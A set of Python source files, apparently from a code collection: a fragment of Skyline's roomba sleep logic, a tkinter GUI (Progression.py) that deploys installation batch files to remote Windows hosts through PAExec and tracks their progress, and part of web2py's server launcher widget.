ROOMBA_OPTIMUM_RUN_DURATION # roomba_optimum_run_duration = 60 roomba_optimum_run_duration = ROOMBA_OPTIMUM_RUN_DURATION if process_runtime < roomba_optimum_run_duration: sleep_for = (roomba_optimum_run_duration - process_runtime) logger.info('%s :: sleeping %.2f for due to low run time' % (skyline_app, sleep_for)) sleep(sleep_for)
Progression.py
from typing import Set from PIL import Image, ImageTk from tkinter.ttk import Style, Progressbar, Combobox from tkinter import messagebox import tkinter import time import subprocess import threading import os import webbrowser import Utils import Settings threading.excepthook = Utils.thread_exceptions class Progression(tkinter.Frame): def __init__(self, parent, controller): tkinter.Frame.__init__(self, parent, bg='white') self.controller = controller self.max_workers = Settings.default_workers self.targets = [] self.kill = False self.first_run = True self.kill_buttons = [] self.execution_is_remote = False self.include_cmd_execution = True self.console_var = tkinter.StringVar(value="Show console") self.remote_var = tkinter.BooleanVar(value=False) self.message_var = tkinter.BooleanVar(value=False) self.use_file_var = tkinter.BooleanVar(value=False) self.workers_var = tkinter.StringVar(value=Settings.default_workers) self.select_computers_var = tkinter.StringVar() self.grid_columnconfigure(0, weight=1) self.grid_rowconfigure(3, weight=1) # Header header = tkinter.Frame(self, bg=Settings.bg_two) header.grid(row=0, sticky='news') header.grid_columnconfigure(1, weight=1) log = tkinter.Button(header, bg=Settings.bg_two, text='Open log', relief='flat', command=self.open_log, fg=Settings.fg_one, cursor='hand2', font=('Verdana', 7), activebackground='white', bd=0) log.grid(row=0, column=0, sticky='w', padx=3) log.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 7, 'underline'), bg='white')) log.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 7, ''), bg=Settings.bg_two)) console = tkinter.Button(header, bg=Settings.bg_two, textvariable=self.console_var, relief='flat', bd=0, command=self.show_hide_console, fg=Settings.fg_one, cursor='hand2', font=('Verdana', 7), activebackground='white') console.grid(row=0, column=1, sticky='w', padx=3) console.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 7, 'underline'), bg='white')) console.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 7, ''), bg=Settings.bg_two)) workers_input = tkinter.Entry( header, width=3, textvariable=self.workers_var, font=('Verdana', 7)) workers_input.grid(row=0, column=3, sticky='e', padx=3) workers_label = tkinter.Label(header, bg=Settings.bg_two, text='Concurrent deployments:', relief='flat', bd=0, font=('Verdana', 7), fg=Settings.fg_one) workers_label.grid(row=0, column=2, sticky='e', padx=3) # Info and options info_label_frame = tkinter.Frame(self, bg='white') info_label_frame.grid(row=1, padx=10, sticky='news', pady=5) info_label_frame.grid_columnconfigure(1, weight=1) self.info_label = tkinter.Label(info_label_frame, bg='white', font=( 'Verdana', 12), relief='flat', text='Initiate deployment') self.info_label.grid(row=0, column=0, sticky='w') self.verify_targets = tkinter.Button(info_label_frame, bg='white', text='Verify ping connections', state='disabled', relief='flat', bd=0, anchor='s', activebackground='white', fg=Settings.fg_one, command=lambda: threading.Thread(target=self.init_deployment, args=(False,), daemon=True).start(), font=('Verdana', 9)) self.verify_targets.grid(row=0, column=1, sticky='e') self.kill_process_button = tkinter.Button(info_label_frame, bg='white', anchor='s', state='disabled', text='Kill open processes', relief='flat', activebackground='white', bd=0, command=lambda: threading.Thread(target=self.kill_running_targets, daemon=True).start(), font=('Verdana', 9)) self.kill_process_button.grid(row=0, column=2, sticky='e') # Remote self.remote_frame = tkinter.Frame(self, bg=Settings.bg_one) self.remote_frame.grid(row=2, sticky='news', padx=10) self.remote_frame.columnconfigure(0, weight=3) self.remote_frame.columnconfigure(2, weight=1) self.remote_checkbutton = tkinter.Checkbutton(self.remote_frame, activebackground=Settings.bg_one, text='Remote deployment', font=('Verdana', 8), relief='flat', variable=self.remote_var, fg=Settings.fg_one, bg=Settings.bg_one, cursor='hand2', command=self.set_execution_type, bd=3, anchor='w', width=30) self.remote_checkbutton.grid(row=0, column=0, sticky='ew') self.remote_checkbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.remote_checkbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.use_file_button = tkinter.Checkbutton(self.remote_frame, text=f'Use targets.txt', font=('Verdana', 8), relief='flat', variable=self.use_file_var, fg=Settings.fg_one, bg=Settings.bg_one, cursor='hand2', activebackground=Settings.bg_one, command=self.update_targets_field, bd=0, anchor='w') self.use_file_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.use_file_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.select_computers_button = Combobox( self.remote_frame, textvariable=self.select_computers_var, justify='right', width=3) self.select_computers_button.config(values=list(sorted(set([line.strip("\n") for line in open( Settings.combobox_loc, "r") if len(line.strip("\n")) > 0]))), font=('Verdana', 7)) self.select_computers_button.bind( '<<ComboboxSelected>>', lambda e: self.targets_text.insert("end", f";{self.select_computers_var.get()}")) self.targets_text = tkinter.Text(self.remote_frame, height=1, font=('Verdana', 9), bd=0, bg='white', fg='black', selectbackground='#ccd9e7', selectforeground='black', highlightthickness=0) # Deployment reports total_process_frame = tkinter.Frame(self, bg='white') total_process_frame.grid(row=3, sticky='news', padx=10) total_process_frame.grid_columnconfigure(0, weight=1) total_process_frame.grid_rowconfigure(0, weight=1) progression_canvas_frame = tkinter.Frame(total_process_frame, bg='white', highlightthickness=2, highlightbackground=Settings.bg_one) progression_canvas_frame.grid(row=0, column=0, sticky="news") progression_canvas_frame.grid_columnconfigure(0, weight=1) progression_canvas_frame.grid_rowconfigure(0, weight=1) self.progression_canvas = tkinter.Canvas(progression_canvas_frame, bg='white', scrollregion=(0, 0, 0, 0), highlightthickness=0) self.progression_canvas.grid(row=0, column=0, sticky="news") progression_scrollbar_frame = tkinter.Frame(total_process_frame) progression_scrollbar_frame.grid(row=0, column=1, sticky='news') progression_scrollbar_frame.grid_columnconfigure(0, weight=1) progression_scrollbar_frame.grid_rowconfigure(0, weight=1) progression_scrollbar_v = tkinter.Scrollbar( progression_scrollbar_frame, command=self.progression_canvas.yview) progression_scrollbar_v.grid(sticky='ns') self.progression_canvas.config( yscrollcommand=progression_scrollbar_v.set) # footer footer = tkinter.Frame(self, bg='white') footer.grid(row=4, sticky='news', padx=5, pady=5) style = Style() style.theme_use('alt') style.configure("green.Horizontal.TProgressbar", foreground=Settings.green_three, background=Settings.green_three, troughcolor=Settings.bg_two, thickness=19, highlightthickness=0, troughrelief='flat') self.progressbar = Progressbar( footer, style="green.Horizontal.TProgressbar", mode="determinate") self.progressbar.grid(row=0, column=1, padx=5, sticky='ew') footer.columnconfigure(1, weight=1) back_image = ImageTk.PhotoImage(Image.open( Settings.buttonback).resize((50, 50), Image.ANTIALIAS)) back_button = tkinter.Button(footer, relief='flat', image=back_image, bg='white', activebackground='white', command=lambda: controller.start_frame("Selection"), cursor='hand2') back_button.grid(row=0, column=0, sticky='w') back_button.image = back_image start_image = ImageTk.PhotoImage(Image.open( Settings.buttongo).resize((50, 50), Image.ANTIALIAS)) self.start_button = tkinter.Button(footer, bg='white', relief='flat', image=start_image, cursor='hand2', command=lambda: threading.Thread(target=self.init_deployment, daemon=True).start(), activebackground='white') self.start_button.grid(row=0, column=2, sticky='w') self.start_button.image = start_image def show_hide_console(self): if self.console_var.get() == "Show console": self.console_var.set("Hide console") Utils.cmd_visibility(show=True) else: self.console_var.set("Show console") Utils.cmd_visibility(show=False) def open_log(self): if os.path.exists(Settings.logfile): webbrowser.open(Settings.logfile) def update_targets_field(self): if self.use_file_var.get(): self.targets_text.grid_remove() else: self.targets_text.grid( row=1, column=0, sticky='ew', padx=2, columnspan=3, pady=2) def set_execution_type(self): if self.remote_var.get(): self.use_file_button.grid(row=0, column=1, sticky='e', padx=2) self.select_computers_button.grid( row=0, column=2, sticky='ew', padx=2) self.update_targets_field() self.verify_targets.config(state='normal', font=( "Verdana", 9, ""), cursor='hand2') self.verify_targets.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.verify_targets.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) else: self.targets_text.grid_remove() self.select_computers_button.grid_remove() self.use_file_button.grid_remove() self.use_file_var.set(0) self.verify_targets.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.verify_targets.unbind("<Enter>") self.verify_targets.unbind("<Leave>") def set_targets(self): if self.execution_is_remote: if self.use_file_var.get(): self.targets = list(sorted(set([line.strip("\n") for line in open( Settings.targets_loc, "r") if len(line.strip("\n")) > 0]))) else: self.targets = [i for i in sorted(set(list(self.targets_text.get( "1.0", "end").replace("\n", "").split(";")))) if len(i) > 0] else: self.targets = ['127.0.0.1'] def create_cmd_file(self, cmd_location, sep='\n'): with open(cmd_location, 'w') as cmd: cmd.write(f'@echo off{sep}echo Starting time: %TIME%{sep}') if Settings.install_state == "Textinput": cmd.write(f"{Settings.text}{sep}") else: packages = Settings.installations if Settings.install_state == "Installation" else Settings.deletions for package in packages: if packages[package][0].get(): cmd.write( f"Echo @ {package}{sep}{packages[package][1]}{sep}") cmd.write( f"Echo ^> {Settings.install_state} of {package} ended with ErrorLevel: %ERRORLEVEL%{sep}") cmd.write( f"echo Final ErrorLevel: %ERRORLEVEL%{sep}echo Ending time: %TIME%") def decode(self, line): if b'\x00' in line and not b'\r' in line: return line.decode('utf-16-le', errors='ignore') else: return line.replace(b"\x00\r\x00", b"").decode('utf-8', errors='ignore') def init_target_deployment(self, hostname, status_name_, cmd_output_button, killbutton, connection, errorlevel, runtime, cmd_output, n_targets): Settings.logger.info(f"INITIATED THREAD FOR {hostname}") cmd_location = os.path.join(Settings.temp_cmd_loc, f"{Settings.instance_uid}_{hostname}.cmd") start_time = time.time() height = 0 lines = "" errorlevels = set() break_loop, logged_overflow = False, False # Verify ping connection pingable = Utils.pingable( hostname, Settings.test_pings) if self.execution_is_remote else True if not pingable: connection.config(text='X', fg=Settings.red_three) errorlevel.config(text="NO PING", fg=Settings.red_three) else: connection.config(text="โœ”", fg=Settings.green_three) if not self.include_cmd_execution: errorlevel.config(text="NO ISSUE", fg=Settings.green_three) # Include execution and outputting of cmd/batch commands if self.include_cmd_execution and pingable and not self.kill: cmd_output_button.config(state='normal', cursor='hand2') cmd_output_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) cmd_output_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) if n_targets == 1: cmd_output_button.invoke() # Init process cmd_location = os.path.join(Settings.temp_cmd_loc, f"{Settings.instance_uid}_{hostname}.cmd") self.create_cmd_file(cmd_location) cmd = [Settings.paexec_loc, f"\\\\{hostname}", "-f", "-s", "-c", "-csrc", cmd_location, os.path.basename(cmd_location)] process = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) # Killbutton config command killbutton.config(cursor='hand2', state='normal', command=lambda: self.kill_target(hostname, process)) killbutton.bind('<Enter>', Utils.lambdaf_event( Utils.obj_bg, status_name_, Settings.red_three), add="+") killbutton.bind('<Leave>', Utils.lambdaf_event( Utils.obj_bg, status_name_, Settings.bg_two), add="+") killbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline')), add="+") killbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, '')), add="+") # Start and read process read_line = time.time() for line in iter(process.stdout.readline, b''): read_line_delta = time.time() - read_line if self.kill: self.kill_target(hostname, process) break_loop = True # Decode line line = self.decode(line).rstrip() if len(line) < 1: continue if line.startswith("Ending time:"): break_loop = True if not errorlevel['text'] == 'ERROR' and 'ErrorLevel: ' in line: lvl = line[line.index("ErrorLevel: ") + len("ErrorLevel: "):] if (lvl.lstrip('-').isdigit()) or lvl.isdigit(): errorlevels.add(int(lvl)) color, text = self.get_err_color_text(errorlevels) errorlevel.config(text=text, fg=color) # Output insertion height += 1 if height-1 <= Settings.max_output: lines += f"{line}\n" if not Settings.use_buffer or (height % Settings.buffersize == 0) or break_loop or\ read_line_delta > Settings.max_buffertime: cmd_output.config(state='normal') cmd_output.insert("end", lines) if height <= Settings.max_output_height or n_targets == 1: cmd_output.config(height=height) cmd_output.config(state='disabled') lines = "" else: if not logged_overflow: cmd_output.config(state='normal') cmd_output.insert("end", f"Maximum output of {Settings.maxoutput} is reached") cmd_output.config(state='disabled') logged_overflow = True # New start time for calculating delta time read_line = time.time() if break_loop: break # Unexpected shutdown if not break_loop and self.include_cmd_execution and pingable or self.kill: errorlevel.config(text='KILLED', fg=Settings.red_three) if len(lines.rstrip()) == 0: Settings.logger.error(f"UNEXPECTED SHUTDOWN FOR {hostname}") else: Settings.logger.error(f"UNEXPECTED SHUTDOWN FOR {hostname} WITH OUTPUT\n{lines.rstrip()}") # Finalize for target if os.path.exists(cmd_location): os.remove(cmd_location) cmd_output.config(state='normal') cmd_output.delete("end-1c linestart", "end") cmd_output.config(state='disabled') status_name_.config(bg=Settings.bg_two, fg=Settings.green_three) killbutton.unbind('<Enter>') killbutton.unbind('<Leave>') if errorlevel['text'] == 'RUNNING': errorlevel.config(text='UNKNOWN') killbutton.config(state='disabled', cursor='arrow', font=("Verdana", 9, "")) runtime.config(text=time.strftime( "%H:%M:%S", time.gmtime(time.time()-start_time))) self.progressbar['value'] = self.progressbar['value'] + 1 self.current_running_threads -= 1 Settings.logger.info( f"TERMINATED THREAD FOR {hostname} WITH {height} READ LINES") def kill_running_targets(self): self.kill = True Settings.logger.info("KILL PROCESS FOR ALL TARGETS HAS BEEN INITIATED") self.kill_process_button.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.kill_process_button.unbind("<Enter>") self.kill_process_button.unbind("<Leave>") for button in self.kill_buttons: button.invoke() def kill_target(self, hostname, process): Settings.logger.info(f"KILL PROCESS HAS BEEN INITIATED FOR {hostname}") process.terminate() process.kill() killprocess = subprocess.Popen(['taskkill', '/S', hostname, '/F', '/T', '/IM', 'PAExec-*'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT) for line in iter(killprocess.stdout.readline, b''): line = self.decode(line).rstrip() if len(line) < 1: continue else: Settings.logger.info(line) def get_err_color_text(self, levels): color = Settings.green_three text = "NO ISSUE" for level in levels: if not level in [0, 1641, 3010]: return Settings.red_three, "ERROR" elif level in [1641, 3010]: color = 'orange' text = "REBOOT" return color, text def set_max_workers(self): input_workers = str(self.workers_var.get()) if input_workers.isdigit() and int(input_workers) > 0: self.max_workers = int(input_workers) else: Settings.logger.error( "Max workers input is not a integer, or is lower than 1.") self.max_workers = Settings.default_workers def setup_canvas_frame(self): self.progression_frame = tkinter.Frame( self.progression_canvas, bg=Settings.bg_two) self.progression_frame.grid_columnconfigure(0, weight=1) self.progression_canvas.bind('<Enter>', lambda event: self.progression_canvas.bind_all( "<MouseWheel>", lambda e: Utils._on_mousewheel(e, self.progression_canvas))) self.progression_canvas.bind( '<Leave>', lambda e: self.progression_canvas.unbind_all("<MouseWheel>")) window = self.progression_canvas.create_window( (0, 0), window=self.progression_frame, anchor='nw') self.progression_frame.bind("<Configure>", lambda e: self.progression_canvas.configure( scrollregion=self.progression_canvas.bbox("all"))) self.progression_canvas.bind( '<Configure>', lambda e: self.progression_canvas.itemconfig(window, width=e.width)) self.progression_canvas.itemconfig( window, width=self.progression_canvas.winfo_width()) def exit_app(self): if Settings.running: if messagebox.askokcancel(title='Warning', message="Do you want to kill all running processes?"): t = threading.Thread(target=self.kill_running_targets, daemon=True) t.start() t.join() Settings.logger.info("ALL THREADS HAVE BEEN TERMINATED") else: return Utils.exit_app() def init_deployment(self, incl_execute=True): # Initialize and (re)set variables and fields if not self.first_run: self.progression_frame.destroy() self.kill = False self.first_run = False Settings.running = True self.kill_buttons = [] self.include_cmd_execution = incl_execute self.execution_is_remote = self.remote_var.get() self.remote_checkbutton.config( state='disabled', font=("Verdana", 8, ""), cursor='arrow') self.remote_checkbutton.unbind("<Enter>") self.remote_checkbutton.unbind("<Leave>") self.kill_process_button.config( state='normal', font=("Verdana", 9, ""), cursor='hand2') self.kill_process_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.kill_process_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) self.info_label.configure(text=Settings.install_state, fg='black') self.start_button.config(state="disabled", cursor='arrow') self.controller.protocol("WM_DELETE_WINDOW", lambda: threading.Thread(target=self.exit_app, daemon=True).start()) self.verify_targets.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.verify_targets.unbind("<Enter>") self.verify_targets.unbind("<Leave>") self.set_targets() self.progressbar['value'] = 0 self.progressbar['maximum'] = len(self.targets) self.current_running_threads = 0 self.set_max_workers() self.setup_canvas_frame() # Create threads for all hostnames and wait for all threads to finish if len(self.targets) > 0: threads = [] for hostname in self.targets: while self.current_running_threads >= self.max_workers: time.sleep(0.5) if self.kill: Settings.logger.info("STOPPED CREATING NEW TARGET FRAMES") break self.current_running_threads += 1 thread = threading.Thread(target=self.init_target_deployment, args=self.create_targetframe(hostname)) threads.append(thread) thread.start() self.progression_frame.update_idletasks() # Wait for all threads and end deployment for t in threads: t.join() self.deployment_finished() Settings.logger.info("ALL THREADS HAVE BEEN TERMINATED") def create_targetframe(self, hostname): status_frame = tkinter.Frame( self.progression_frame, bg=Settings.bg_two) status_frame.grid(sticky='news', padx=3, pady=3) status_frame.grid_columnconfigure(1, weight=1) status_frame.grid_rowconfigure(1, weight=1) output_button = tkinter.Button(status_frame, text="แ", font=('Verdana', 9), bg=Settings.bg_two, relief='flat', bd=0, anchor='w', activebackground=Settings.bg_two, state='disabled', width=2) output_button.grid(row=0, column=0, sticky='ew', padx=3) cmd_output_frame = tkinter.Frame(status_frame) cmd_output_frame.grid_columnconfigure(0, weight=1) cmd_output = tkinter.Text(cmd_output_frame, font=('Verdana', 7), bg='white', bd=2, relief='sunken', state='disabled', height=0, highlightthickness=0, selectbackground=Settings.bg_one, selectforeground=Settings.fg_one) cmd_output.grid(row=0, column=0, sticky="nsew") cmd_output_scrollbar = tkinter.Scrollbar(cmd_output_frame, command=cmd_output.yview, bg=Settings.bg_two) cmd_output_scrollbar.grid(row=0, column=1, sticky="news") cmd_output.config(yscrollcommand=cmd_output_scrollbar.set) output_button.config( command=Utils.lambdaf(self.show_hide_cmd_output_frame, output_button, cmd_output_frame)) status_name_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) status_name_frame.grid(row=0, column=1, sticky='ew') status_name_frame.grid_columnconfigure(1, weight=1) status_name = tkinter.Label(status_name_frame, text="Name:", anchor='w', font=('Verdana', 9), bg=Settings.bg_two) status_name.grid(row=0, column=0, sticky='ew') status_name_ = tkinter.Label(status_name_frame, text=hostname, anchor='w', borderwidth=1, relief="flat", font=('Verdana', 9, 'bold'), bg=Settings.bg_two) status_name_.grid(row=0, column=1, sticky='ew') connection_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) connection_frame.grid(row=0, column=4, sticky='ew') connection = tkinter.Label( connection_frame, text="Ping:", font=('Verdana', 9), bg=Settings.bg_two, anchor='w') connection.grid(row=0, column=1, sticky='ew') connection_ = tkinter.Label(connection_frame, font=('Verdana', 9, 'bold'), text='-', bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=2) connection_.grid(row=0, column=2, sticky='ew') errorlevel_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) errorlevel_frame.grid(row=0, column=3) errorlevel = tkinter.Label( errorlevel_frame, text="State:", font=('Verdana', 9), bg=Settings.bg_two, anchor='w') errorlevel.grid(row=0, column=0, sticky='ew') errorlevel_ = tkinter.Label(errorlevel_frame, text="RUNNING", font=('Verdana', 9, 'bold'), bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=10) errorlevel_.grid(row=0, column=1, sticky='ew') runtime_frame = tkinter.Frame(status_frame, bg=Settings.bg_two) runtime_frame.grid(row=0, column=2, sticky='ew') runtime_frame.grid_columnconfigure(1, weight=1) runtime = tkinter.Label( runtime_frame, text="Runtime:", font=('Verdana', 9), bg=Settings.bg_two, anchor='e') runtime.grid(row=0, column=0, sticky='ew') runtime_ = tkinter.Label(runtime_frame, font=('Verdana', 9, 'bold'), bg=Settings.bg_two, anchor='w', borderwidth=1, relief="flat", width=10, text='-') runtime_.grid(row=0, column=1, sticky='ew') killbutton = tkinter.Button(status_frame, text="Kill", font=('Verdana', 9), bg=Settings.bg_two, anchor='e', relief="flat", activebackground=Settings.bg_two, bd=0, state='disabled', width=2) killbutton.grid(row=0, column=5, sticky='ew', padx=3) self.kill_buttons.append(killbutton) return (hostname, status_name_, output_button, killbutton, connection_, errorlevel_, runtime_, cmd_output, len(self.targets)) def show_hide_cmd_output_frame(self, button, textframe): if button['text'] == "แ": button.config(text="แƒ") textframe.grid(row=1, sticky="news", pady=2, columnspan=7) else: button.config(text="แ") textframe.grid_forget() def deployment_finished(self): Settings.running = False self.remote_checkbutton.config( state='normal', font=("Verdana", 8, ""), cursor='hand2') self.remote_checkbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.remote_checkbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.kill_process_button.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.kill_process_button.unbind("<Enter>") self.kill_process_button.unbind("<Leave>") self.start_button.config(state='normal', cursor='hand2') if self.execution_is_remote: self.verify_targets.config(state='normal', font=( "Verdana", 9, ""), cursor='hand2') self.verify_targets.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.verify_targets.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) self.progressbar['value'] = self.progressbar['maximum']
widget.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ This file is part of the web2py Web Framework Copyrighted by Massimo Di Pierro <[email protected]> License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html) The widget is called from web2py. """ import datetime import sys import cStringIO import time import thread import threading import os import socket import signal import math import logging import newcron import getpass import gluon.main as main from gluon.fileutils import read_file, write_file, create_welcome_w2p from gluon.settings import global_settings from gluon.shell import run, test from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo ProgramName = 'web2py Web Framework' ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str( datetime.datetime.now().year) ProgramVersion = read_file('VERSION').strip() ProgramInfo = '''%s %s %s''' % (ProgramName, ProgramAuthor, ProgramVersion) if not sys.version[:3] in ['2.5', '2.6', '2.7']: msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s' msg = msg % sys.version sys.stderr.write(msg) logger = logging.getLogger("web2py") def run_system_tests(options): """ Runs unittests for gluon.tests """ import subprocess major_version = sys.version_info[0] minor_version = sys.version_info[1] if major_version == 2: if minor_version in (5, 6): sys.stderr.write("Python 2.5 or 2.6\n") ret = subprocess.call(['unit2', '-v', 'gluon.tests']) elif minor_version in (7,): call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests'] if options.with_coverage: try: import coverage coverage_config = os.environ.get( "COVERAGE_PROCESS_START", os.path.join('gluon', 'tests', 'coverage.ini')) call_args = ['coverage', 'run', '--rcfile=%s' % coverage_config, '-m', 'unittest', '-v', 'gluon.tests'] except: sys.stderr.write('Coverage was not installed, skipping\n') sys.stderr.write("Python 2.7\n") ret = subprocess.call(call_args) else: sys.stderr.write("unknown python 2.x version\n") ret = 256 else: sys.stderr.write("Only Python 2.x supported.\n") ret = 256 sys.exit(ret and 1) class IO(object): """ """ def __init__(self): """ """ self.buffer = cStringIO.StringIO() def write(self, data): """ """ sys.__stdout__.write(data) if hasattr(self, 'callback'): self.callback(data) else: self.buffer.write(data) def get_url(host, path='/', proto='http', port=80): if ':' in host: host = '[%s]' % host else: host = host.replace('0.0.0.0', '127.0.0.1') if path.startswith('/'): path = path[1:] if proto.endswith(':'): proto = proto[:-1] if not port or port == 80: port = '' else: port = ':%s' % port return '%s://%s%s/%s' % (proto, host, port, path) def start_browser(url, startup=False): if startup: print 'please visit:' print '\t', url print 'starting browser...' try: import webbrowser webbrowser.open(url) except: print 'warning: unable to detect your browser' def presentation(root): """ Draw the splash screen """ import Tkinter root.withdraw() dx = root.winfo_screenwidth() dy = root.winfo_screenheight() dialog = Tkinter.Toplevel(root, bg='white') dialog.geometry('%ix%i+%i+%i' % (500, 300, dx / 2 - 200, dy / 2 - 150)) dialog.overrideredirect(1) dialog.focus_force() canvas = Tkinter.Canvas(dialog, background='white', width=500, height=300) canvas.pack() root.update() logo = os.path.join('extras','icons','splashlogo.gif') if os.path.exists(logo): img = Tkinter.PhotoImage(file=logo) pnl = Tkinter.Label(canvas, image=img, background='white', bd=0) pnl.pack(side='top', fill='both', expand='yes') # Prevent garbage collection of img pnl.image = img def add_label(text='Change Me', font_size=12, foreground='#195866', height=1): return Tkinter.Label( master=canvas, width=250, height=height, text=text, font=('Helvetica', font_size), anchor=Tkinter.CENTER, foreground=foreground, background='white' ) add_label('Welcome to...').pack(side='top') add_label(ProgramName, 18, '#FF5C1F', 2).pack() add_label(ProgramAuthor).pack() add_label(ProgramVersion).pack() root.update() time.sleep(5) dialog.destroy() return class web2pyDialog(object): """ Main window dialog """ def __init__(self, root, options): """ web2pyDialog constructor """ import Tkinter import tkMessageBox root.title('web2py server') self.root = Tkinter.Toplevel(root) self.options = options self.scheduler_processes = {} self.menu = Tkinter.Menu(self.root) servermenu = Tkinter.Menu(self.menu, tearoff=0) httplog = os.path.join(self.options.folder, 'httpserver.log') iconphoto = os.path.join('extras','icons','web2py.gif') if os.path.exists(iconphoto): img = Tkinter.PhotoImage(file=iconphoto) self.root.tk.call('wm', 'iconphoto', self.root._w, img) # Building the Menu item = lambda: start_browser(httplog) servermenu.add_command(label='View httpserver.log', command=item) servermenu.add_command(label='Quit (pid:%i)' % os.getpid(), command=self.quit) self.menu.add_cascade(label='Server', menu=servermenu) self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0) self.menu.add_cascade(label='Pages', menu=self.pagesmenu) #scheduler menu self.schedmenu = Tkinter.Menu(self.menu, tearoff=0) self.menu.add_cascade(label='Scheduler', menu=self.schedmenu) #start and register schedulers from options self.update_schedulers(start=True) helpmenu = Tkinter.Menu(self.menu, tearoff=0) # Home Page item = lambda: start_browser('http://www.web2py.com/') helpmenu.add_command(label='Home Page', command=item) # About item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo) helpmenu.add_command(label='About', command=item) self.menu.add_cascade(label='Info', menu=helpmenu) self.root.config(menu=self.menu) if options.taskbar: self.root.protocol('WM_DELETE_WINDOW', lambda: self.quit(True)) else: self.root.protocol('WM_DELETE_WINDOW', self.quit) sticky = Tkinter.NW # IP Tkinter.Label(self.root, text='Server IP:', justify=Tkinter.LEFT).grid(row=0, column=0, sticky=sticky) self.ips = {} self.selected_ip = Tkinter.StringVar() row = 0 ips = [('127.0.0.1', 'Local (IPv4)')] + \ ([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \ [(ip, 'Public') for ip in options.ips] + \ [('0.0.0.0', 'Public')] for ip, legend in ips: self.ips[ip] = Tkinter.Radiobutton( self.root, text='%s (%s)' % (legend, ip), variable=self.selected_ip, value=ip) self.ips[ip].grid(row=row, column=1, sticky=sticky) if row == 0: self.ips[ip].select() row += 1 shift = row # Port Tkinter.Label(self.root, text='Server Port:', justify=Tkinter.LEFT).grid(row=shift, column=0, sticky=sticky) self.port_number = Tkinter.Entry(self.root) self.port_number.insert(Tkinter.END, self.options.port) self.port_number.grid(row=shift, column=1, sticky=sticky) # Password Tkinter.Label(self.root, text='Choose Password:', justify=Tkinter.LEFT).grid(row=shift + 1, column=0, sticky=sticky) self.password = Tkinter.Entry(self.root, show='*') self.password.bind('<Return>', lambda e: self.start()) self.password.focus_force() self.password.grid(row=shift + 1, column=1, sticky=sticky) # Prepare the canvas self.canvas = Tkinter.Canvas(self.root, width=300, height=100, bg='black') self.canvas.grid(row=shift + 2, column=0, columnspan=2) self.canvas.after(1000, self.update_canvas) # Prepare the frame frame = Tkinter.Frame(self.root) frame.grid(row=shift + 3, column=0, columnspan=2) # Start button self.button_start = Tkinter.Button(frame, text='start server', command=self.start) self.button_start.grid(row=0, column=0) # Stop button self.button_stop = Tkinter.Button(frame, text='stop server', command=self.stop) self.button_stop.grid(row=0, column=1) self.button_stop.configure(state='disabled') if options.taskbar: import gluon.contrib.taskbar_widget self.tb = gluon.contrib.taskbar_widget.TaskBarIcon() self.checkTaskBar() if options.password != '<ask>': self.password.insert(0, options.password) self.start() self.root.withdraw() else: self.tb = None def update_schedulers(self, start=False): apps = [] available_apps = [arq for arq in os.listdir('applications/')] available_apps = [arq for arq in available_apps if os.path.exists( 'applications/%s/models/scheduler.py' % arq)] if start: #the widget takes care of starting the scheduler if self.options.scheduler and self.options.with_scheduler: apps = [app.strip() for app in self.options.scheduler.split(',') if app in available_apps] for app in apps: self.try_start_scheduler(app) #reset the menu self.schedmenu.delete(0, len(available_apps)) for arq in available_apps: if arq not in self.scheduler_processes: item = lambda u = arq: self.try_start_scheduler(u) self.schedmenu.add_command(label="start %s" % arq, command=item) if arq in self.scheduler_processes: item = lambda u = arq: self.try_stop_scheduler(u) self.schedmenu.add_command(label="stop %s" % arq, command=item) def start_schedulers(self, app): try: from multiprocessing import Process except: sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n') return code = "from gluon import current;current._scheduler.loop()" print 'starting scheduler from widget for "%s"...' % app args = (app, True, True, None, False, code) logging.getLogger().setLevel(self.options.debuglevel) p = Process(target=run, args=args) self.scheduler_processes[app] = p self.update_schedulers() print "Currently running %s scheduler processes" % ( len(self.scheduler_processes)) p.start() print "Processes started" def try_stop_scheduler(self, app): if app in self.scheduler_processes: p = self.scheduler_processes[app] del self.scheduler_processes[app] 